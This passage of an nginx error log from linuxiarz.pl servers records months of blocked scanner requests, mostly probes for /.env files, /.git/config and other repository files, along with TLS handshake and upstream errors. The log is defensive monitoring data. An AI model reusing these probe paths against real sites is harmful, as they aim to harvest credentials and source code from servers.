4004304#4004304: *12416 access forbidden by rule, client: 185.156.72.30, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/05/22 16:55:21 [error] 4004304#4004304: *70265 access forbidden by rule, client: 81.17.18.18, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/05/24 17:53:54 [error] 4004305#4004305: *128147 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/05/31 19:22:06 [error] 1042568#1042568: *63337 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/06/02 23:36:23 [error] 1042569#1042569: *110905 access forbidden by rule, client: 83.147.52.49, server: nginx.linuxiarz.pl, request: "GET /var/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/05 02:06:12 [error] 1858838#1858838: *64338 access forbidden by rule, client: 83.147.52.49, server: nginx.linuxiarz.pl, request: "GET /api/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/06 08:23:29 [error] 1858838#1858838: *88552 access forbidden by rule, client: 83.147.52.37, server: nginx.linuxiarz.pl, request: "GET /app/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/06 20:54:56 [error] 1858838#1858838: *97486 access forbidden by rule, client: 179.43.148.58, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/06 21:46:02 [error] 1858838#1858838: *98223 access forbidden by rule, client: 179.43.148.58, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/06/06 23:11:40 [error] 1858838#1858838: *99376 access forbidden by rule, client: 179.43.178.226, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/07 22:28:18 [error] 1858838#1858838: *113835 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/06/07 23:25:12 [error] 1100#1100: *187 access forbidden by rule, client: 83.147.52.49, server: nginx.linuxiarz.pl, request: "GET /assets/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/12 04:17:56 [error] 1100#1100: *102068 access forbidden by rule, client: 83.147.52.37, server: nginx.linuxiarz.pl, request: "GET /dev/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/12 18:48:48 [error] 1100#1100: *114744 access forbidden by rule, client: 97.74.94.186, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/12 18:49:16 [error] 1100#1100: *114747 access forbidden by rule, client: 97.74.94.186, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/12 18:49:41 [error] 1100#1100: *114748 access forbidden by rule, client: 97.74.94.186, server: nginx.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/12 18:50:09 [error] 1100#1100: *114760 access forbidden by rule, client: 97.74.94.186, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/12 18:50:32 [error] 1100#1100: *114761 access forbidden by rule, client: 97.74.94.186, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/14 22:06:16 [error] 985150#985150: *1197 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/06/19 07:35:15 [error] 985151#985151: *117071 access forbidden by rule, client: 54.82.80.246, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/06/19 10:46:04 [error] 985151#985151: *119976 access forbidden by rule, client: 54.82.80.246, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/06/20 04:55:43 [error] 1664600#1664600: *8849 access forbidden by rule, client: 54.82.80.246, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/06/20 04:57:39 [error] 1664600#1664600: *8880 access forbidden by rule, client: 54.82.80.246, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/06/21 17:54:17 [error] 1664600#1664600: *44827 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/06/23 11:22:33 [error] 1664600#1664600: *89598 access forbidden by rule, client: 45.88.90.2, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/24 02:34:04 [error] 1664600#1664600: *108742 access forbidden by rule, client: 93.123.85.94, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/26 00:33:36 [error] 1664600#1664600: *175172 access forbidden by rule, client: 104.193.255.59, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/06/29 02:59:52 [error] 2889990#2889990: *11264 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/07/01 19:41:32 [error] 2889989#2889989: *114400 access forbidden by rule, client: 106.75.152.66, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/07/02 10:38:06 [error] 2889989#2889989: *127724 access forbidden by rule, client: 106.75.5.52, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/07/02 13:01:36 [error] 2889989#2889989: *130099 access forbidden by rule, client: 106.75.137.241, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/07/05 21:33:50 [error] 1298#1298: *37303 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/07/09 01:42:00 [error] 1298#1298: *130329 access forbidden by rule, client: 31.220.0.86, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/07/13 01:38:59 [error] 1297#1297: *256055 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/07/14 20:24:34 [error] 30942#30942: *19811 access forbidden by rule, client: 106.75.134.172, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/07/19 14:41:12 [error] 4983#4983: *96972 client sent invalid header while reading client request, client: 138.246.253.15, server: nginx.linuxiarz.pl +2024/07/19 21:50:53 [error] 4983#4983: *102074 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/07/22 23:58:25 [error] 4983#4983: *177822 access forbidden by rule, client: 106.75.166.204, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/07/23 17:59:12 [error] 4983#4983: *215693 access forbidden by rule, client: 106.75.152.66, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/07/23 19:50:37 [error] 4983#4983: *217231 access forbidden by rule, client: 106.75.173.108, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/07/26 22:02:29 [error] 4982#4982: *313801 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/07/27 03:04:44 [error] 4982#4982: *318183 access forbidden by rule, client: 213.199.47.22, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/08/01 20:42:32 [error] 4983#4983: *478871 access forbidden by rule, client: 106.75.190.150, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/08/02 15:05:06 [error] 4983#4983: *498581 access forbidden by rule, client: 106.75.164.40, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/08/02 17:50:09 [error] 4983#4983: *501390 access forbidden by rule, client: 106.75.190.150, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/08/07 21:33:59 [error] 4983#4983: *621461 access forbidden by rule, client: 87.228.152.25, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/08/07 21:34:00 [error] 4983#4983: *621464 access forbidden by rule, client: 87.228.152.25, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/config" +2024/08/08 03:40:28 [error] 4983#4983: *628805 access forbidden by rule, client: 45.148.10.59, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/08/13 23:02:22 [error] 1281#1281: *155629 access forbidden by rule, client: 170.64.222.247, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/2.0", host: "nginx.linuxiarz.pl" +2024/08/13 23:04:21 [error] 1281#1281: *155734 access forbidden by rule, client: 170.64.222.247, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl" +2024/08/18 16:50:16 [error] 1383682#1383682: *3787 access forbidden by rule, client: 83.147.52.49, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/08/21 18:16:55 [error] 1801411#1801411: *6050 access forbidden by rule, client: 94.156.66.91, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/08/30 22:46:03 [error] 1207#1207: *92920 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/09/07 02:44:46 [error] 1208#1208: *236939 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/09/14 02:22:23 [error] 1238#1238: *47514 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/09/16 10:20:40 [error] 1238#1238: *85287 access forbidden by rule, client: 109.176.202.81, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/09/20 22:42:35 [error] 1287015#1287015: *38 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/09/27 18:12:54 [error] 1156#1156: *54104 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/09/27 20:02:23 [error] 1156#1156: *55348 access forbidden by rule, client: 52.23.255.112, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/09/27 20:13:47 [error] 1156#1156: *55472 access forbidden by rule, client: 52.23.255.112, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/10/01 10:11:03 [error] 1156#1156: *129645 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 109.173.166.49, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2024/10/01 10:11:04 [error] 1156#1156: *129645 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.166.49, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2024/10/01 10:11:06 [error] 1156#1156: *129645 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.166.49, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2024/10/01 10:11:06 [error] 1156#1156: *129645 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.166.49, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2024/10/01 10:11:09 [error] 1156#1156: *129645 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.166.49, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2024/10/01 10:11:09 [error] 1156#1156: *129645 connect() failed (111: Connection refused) while connecting to upstream, client: 109.173.166.49, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2024/10/04 18:02:59 [error] 1154#1154: *187544 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/10/06 12:23:30 [error] 1156#1156: *243273 access forbidden by rule, client: 159.223.48.156, server: nginx.linuxiarz.pl, request: "GET /.wp-cache.php HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "www.google.com" +2024/10/06 12:23:31 [error] 1156#1156: *243273 access forbidden by rule, client: 159.223.48.156, server: nginx.linuxiarz.pl, request: "GET /.wp-cache.php HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "www.google.com" +2024/10/09 14:31:20 [error] 1156#1156: *307489 access forbidden by rule, client: 92.118.39.244, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/10/10 05:36:22 [error] 1156#1156: *317143 access forbidden by rule, client: 178.18.254.145, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/10/10 21:56:30 [error] 1156#1156: *335034 access forbidden by rule, client: 178.18.254.145, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/10/11 19:27:09 [error] 1156#1156: *358027 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/10/15 00:57:29 [error] 1156#1156: *448098 access forbidden by rule, client: 92.118.39.244, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/10/15 00:57:30 [error] 1156#1156: *448099 access forbidden by rule, client: 92.118.39.244, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/10/18 22:47:57 [error] 1154#1154: *540298 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/10/22 21:08:45 [error] 1156#1156: *665574 access forbidden by rule, client: 54.197.218.106, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/10/26 00:55:09 [error] 1172#1172: *3568 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/10/27 13:43:48 [error] 1171#1171: *43531 access forbidden by rule, client: 45.88.186.10, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/10/28 20:50:36 [error] 345312#345312: *28291 access forbidden by rule, client: 18.198.202.167, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/10/28 22:08:03 [error] 345312#345312: *30170 access forbidden by rule, client: 45.88.186.10, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/10/31 11:17:37 [error] 345312#345312: *100166 access forbidden by rule, client: 87.120.125.80, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/11/01 21:12:56 [error] 345312#345312: *130490 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/11/07 01:09:48 [error] 345312#345312: *239345 access forbidden by rule, client: 87.120.114.254, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/11/08 22:09:13 [error] 345311#345311: *289539 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/11/22 16:08:21 [error] 3965866#3965866: *108114 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/12/01 01:02:20 [error] 1314#1314: *159065 access forbidden by rule, client: 15.237.246.5, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/01 04:13:38 [error] 1314#1314: *169063 access forbidden by rule, client: 35.174.116.166, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/03 03:31:53 [error] 1314#1314: *208269 access forbidden by rule, client: 109.205.213.18, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/03 03:31:53 [error] 1314#1314: *208270 access forbidden by rule, client: 109.205.213.18, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/03 04:38:36 [error] 1314#1314: *209257 access forbidden by rule, client: 34.218.51.203, server: nginx.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/06 19:43:15 [error] 1315#1315: *290845 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/12/08 23:52:13 [error] 1314#1314: *348469 access forbidden by rule, client: 45.148.10.236, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/13 07:37:47 [error] 1314#1314: *455952 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/12/20 17:51:24 [error] 1314#1314: *636967 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/12/24 12:02:50 [error] 1314#1314: *720648 access forbidden by rule, client: 109.205.213.230, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/24 12:02:50 [error] 1314#1314: *720649 access forbidden by rule, client: 109.205.213.230, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/24 12:02:52 [error] 1314#1314: *720652 access forbidden by rule, client: 109.205.213.230, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/24 12:02:53 [error] 1314#1314: *720653 access forbidden by rule, client: 109.205.213.230, server: nginx.linuxiarz.pl, request: "GET /login/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/24 12:02:53 [error] 1314#1314: *720654 access forbidden by rule, client: 109.205.213.230, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/26 13:17:08 [error] 3443131#3443131: *8 access forbidden by rule, client: 109.205.213.26, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/26 13:17:09 [error] 3443131#3443131: *9 access forbidden by rule, client: 109.205.213.26, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/26 13:17:10 [error] 3443131#3443131: *12 access forbidden by rule, client: 109.205.213.26, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/26 13:17:11 [error] 3443131#3443131: *13 access forbidden by rule, client: 109.205.213.26, server: nginx.linuxiarz.pl, request: "GET /login/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/26 13:17:11 [error] 3443131#3443131: *14 access forbidden by rule, client: 109.205.213.26, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/12/27 17:17:31 [error] 3927320#3927320: *3502 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/12/29 17:26:03 [error] 4046426#4046426: *43983 access forbidden by rule, client: 40.70.56.129, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/01/01 06:27:23 [error] 1016151#1016151: *50248 access forbidden by rule, client: 44.203.247.221, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/01/03 15:17:00 [error] 1016151#1016151: *128486 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2025/01/07 13:37:52 [alert] 2966708#2966708: *66559 sendmsg() failed (1: Operation not permitted) while sending frames, client: 46.241.83.81, server: 0.0.0.0:443 +2025/01/10 17:31:35 [error] 2966709#2966709: *142932 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2025/01/18 22:09:32 [error] 3160436#3160436: *66820 access forbidden by rule, client: 185.196.220.16, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/01/24 20:02:14 [error] 3160436#3160436: *193657 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2025/01/29 00:52:35 [error] 3160436#3160436: *280783 access forbidden by rule, client: 45.125.66.35, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/01/29 00:52:35 [error] 3160436#3160436: *280784 access forbidden by rule, client: 45.125.66.35, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/01/30 15:59:24 [error] 3160435#3160435: *310915 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/02/02 07:08:06 [error] 1498291#1498291: *9268 access forbidden by rule, client: 45.125.66.35, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/04 01:49:29 [error] 157819#157819: *21290 access forbidden by rule, client: 216.81.248.39, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/07 12:36:08 [error] 1210#1210: *65623 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/02/14 16:38:48 [error] 1186#1186: *14171 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/02/14 23:48:08 [error] 1186#1186: *27537 access forbidden by rule, client: 45.148.10.235, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/14 23:48:08 [error] 1186#1186: *27539 access forbidden by rule, client: 45.148.10.235, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/14 23:48:08 [error] 1186#1186: *27550 access forbidden by rule, client: 45.148.10.235, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/14 23:48:10 [error] 1186#1186: *27610 access forbidden by rule, client: 45.148.10.235, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/14 23:48:11 [error] 1186#1186: *27630 access forbidden by rule, client: 45.148.10.235, server: nginx.linuxiarz.pl, request: "GET /login/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/14 23:48:11 [error] 1186#1186: *27649 access forbidden by rule, client: 45.148.10.235, server: nginx.linuxiarz.pl, request: "GET /local/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/14 23:48:11 [error] 1186#1186: *27660 access forbidden by rule, client: 45.148.10.235, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/14 23:48:11 [error] 1186#1186: *27674 access forbidden by rule, client: 45.148.10.235, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/14 23:48:11 [error] 1186#1186: *27688 access forbidden by rule, client: 45.148.10.235, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/17 07:53:20 [error] 1186#1186: *126900 access forbidden by rule, client: 100.27.251.12, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/02/17 08:52:17 [error] 1186#1186: *127604 access forbidden by rule, client: 100.27.251.12, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/19 15:48:20 [error] 1186#1186: *191057 access forbidden by rule, client: 38.145.218.189, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/19 15:48:21 [error] 1186#1186: *191059 access forbidden by rule, client: 38.145.218.189, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/19 15:48:22 [error] 1186#1186: *191060 access forbidden by rule, client: 38.145.218.189, server: nginx.linuxiarz.pl, request: "GET /.git/description HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/19 15:48:23 [error] 1186#1186: *191061 access forbidden by rule, client: 38.145.218.189, server: nginx.linuxiarz.pl, request: "GET /.git/index HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/19 15:48:23 [error] 1186#1186: *191062 access forbidden by rule, client: 38.145.218.189, server: nginx.linuxiarz.pl, request: "GET /.git/refs/heads/main HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/19 15:48:24 [error] 1186#1186: *191063 access forbidden by rule, client: 38.145.218.189, server: nginx.linuxiarz.pl, request: "GET /.git/refs/heads/master HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/19 19:18:35 [error] 1186#1186: *195304 access forbidden by rule, client: 137.184.220.1, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/21 17:19:29 [error] 1186#1186: *282802 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/02/26 07:37:55 [error] 229357#229357: *42655 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/26 07:37:55 [error] 229357#229357: *42656 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/26 07:37:56 [error] 229357#229357: *42657 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/02/26 07:39:12 [error] 229357#229357: *42745 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/02/26 07:39:12 [error] 229357#229357: *42746 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/02/26 07:39:12 [error] 229357#229357: *42747 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/02/28 20:09:25 [error] 946166#946166: *38463 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/03/05 20:09:40 [error] 3404146#3404146: *8628 access forbidden by rule, client: 44.234.34.165, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/05 20:41:37 [error] 3404146#3404146: *9494 